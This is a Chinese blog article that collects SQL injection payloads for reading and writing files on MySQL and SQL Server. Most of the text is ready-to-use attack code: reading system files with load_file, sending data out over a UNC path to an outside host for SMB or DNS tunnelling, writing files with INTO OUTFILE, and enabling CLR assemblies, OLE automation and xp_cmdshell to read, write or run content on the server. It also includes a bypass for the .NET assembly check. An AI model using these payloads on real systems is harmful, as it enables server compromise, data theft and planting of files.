欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

关于SQL注入中文件读写的方法总结

程序员文章站 2022-03-07 12:23:54
前言 sql注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是sql注入中的文件读写这一块的内容,具体的一起来看看。 一、mysql 读文件 常见的...

前言

sql注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是sql注入中的文件读写这一块的内容,具体的一起来看看。

一、mysql

读文件

常见的读文件,可以用16进制代替字符串

select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于dns隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'd:/1.txt'
select 0x313233 into dumpfile 'd:/1.txt'

二、 sql server

读文件

1. bulk insert

create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';

2. clr集成

// 开启clr集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.net二进制文件到数据库中;但是他会验证是否为合法.net程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.net的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'

3. script.filesystemobject

# 开启ole automation procedures
 
sp_configure 'show advanced options',1;
reconfigure;
sp_configure 'ole automation procedures',1;
reconfigure;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. script.filesystemobject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', null ,'this is the test string'

2. bcp复制文件(测试失败,无bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -u sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、oracle

pass,oracle太坑了~~~几乎都受到pl/sql的限制,暂时不讨论

总结

以上就是关于sql注入中文件的读写方法总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。